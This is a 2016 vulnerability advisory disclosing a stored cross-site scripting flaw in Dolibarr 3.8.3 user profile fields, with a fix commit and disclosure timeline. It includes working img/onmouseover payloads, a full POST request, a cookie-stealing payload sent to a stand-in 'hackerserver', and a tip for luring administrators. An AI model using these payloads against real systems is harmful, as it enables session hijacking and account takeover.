######################################################################
# Exploit Title: XSS on dolibarr 3.8.3
# Date: 03/01/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: http://www.dolibarr.org/
# Category: XSS
######################################################################

Dolibarr description :
======================================================================
Dolibarr ERP & CRM is a modern and easy to use web software to manage your business (contacts, invoices, orders, products, stocks, agenda, emailings, etc...).

It's opensource and free software designed for small companies, foundations and freelances.
You can install and use it as a standalone application, or online on a mutualized or dedicated server to use it from anywhere. Dolibarr is also available on ready to use Cloud services.

Vulnerability description :
======================================================================
A Stored XSS is available in the Dolibarr 3.8.3 core code. No module needs to be activated to exploit this XSS vulnerability because an attacker can use the user attributes management to do it.

This XSS can be exploited through a basic user account on the dolibarr installation. Impacted users are administrators and users that have right to check other user's attributes.

PoC n°1 : Stored XSS in user attributes:
====================================
Once a simple user is connected with his account, he can modifiy his attributes like Last name, First name, Mobile number, etc.. These informations can be reviewed by other users who have administration privileges.  

Note that some basic protection are present just after form submitting. These protection doesn't allow attacker to use basic JavaScript tips like "<script>" tags or "onerror" JavaScript. But some other events or still allowed.

Using the <IMG> HTML tag and the "onmouseover" JavaScript event, we can force an admin to pass his mouse over the injected image. This event can be used to execute valid JavaScript instructions in the administrator browser or in browser of other users allowed to check user's attributes.

PoC : 
As an authenticated user, fullfill "Last name", "First name", "email", "job" or "signature" input with this : 
user1<img src=x onmouseover=alert(1)>

[REQUEST]
http://server/dolibarr/htdocs/user/card.php?id=2
[POSTDATA]
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="token"
3e01b40f4659396870a384c16213e400
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="action"
update
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="entity"
1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="lastname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="firstname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="job"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="gender"
man
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="login"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="password"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="admin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="superadmin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_phone"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="user_mobile"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_fax"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="email"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="signature"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="fk_user"
-1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="weeklyhours"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="save"
Save
-----------------------------7677991721297181448923571907--

Note that "First name" and "Last name"  input are displayed in the "List of users" page, but they are truncated after 50 characters. This trunctation limits available XSS payloads. We can use the "signature" input to insert more JavaScript instructions in the same HTML form. Admin will then see this signature when they will click on a user in the "List of users" to see all his attributes.

Image insertion can target an existent or a non existent image. A little tips to have more chance to trap an admin is to upload a very big image (like 1920*1080) that will cover all the website page.

Once attributes are modified. Another user like an admin can check your attributes and then execute JavaScript instruction by passing his mouse over the injected image. Here is another Poc that will send the admin's cookie on a website controled  by an attacker using a GET HTTP request. Inject this payload in the "signature" input : 
<img src=x onmouseover=document.location="http://hackerserver?c="+document.cookie+"">

Using this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such as cookies.


Screenshots :
======================================================================
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-03.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-04.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-05.jpg

Solution: 
======================================================================

The fix concerning this vulnerability is available on Dolibarr github repository : https://github.com/Dolibarr/dolibarr/issues/4341  / https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56
 
Additional resources :
======================================================================
- https://www.youtube.com/watch?v=p2rFWJOCJC8
- http://www.information-security.fr/en/xss-dolibarr-version-3-8-3/ 
- https://github.com/Dolibarr/dolibarr/issues/4341
- https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56
 

Report timeline :
======================================================================
2016-01-03 : Editor informed for vulnerability
2016-01-07 : Vulnerability is fixed
2016-01-11 : Advisory

Credits :
======================================================================
 
    88888888
   88      888                                         88    88
  888       88                                         88
  788           Z88      88  88.888888     8888888   888888  88    8888888.
   888888.       88     88   888    Z88   88     88    88    88   88     88
       8888888    88    88   88      88  88       88   88    88   888
            888   88   88    88      88  88888888888   88    88     888888
  88         88    88  8.    88      88  88            88    88          888
  888       ,88     8I88     88      88   88      88   88    88  .88     .88
   ?8888888888.     888      88      88    88888888    8888  88   =88888888
       888.          88
                    88    www.synetis.com
                 8888  Consulting firm in management and information security
 
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

--
SYNETIS 
CONTACT: www.synetis.com | www.information-security.fr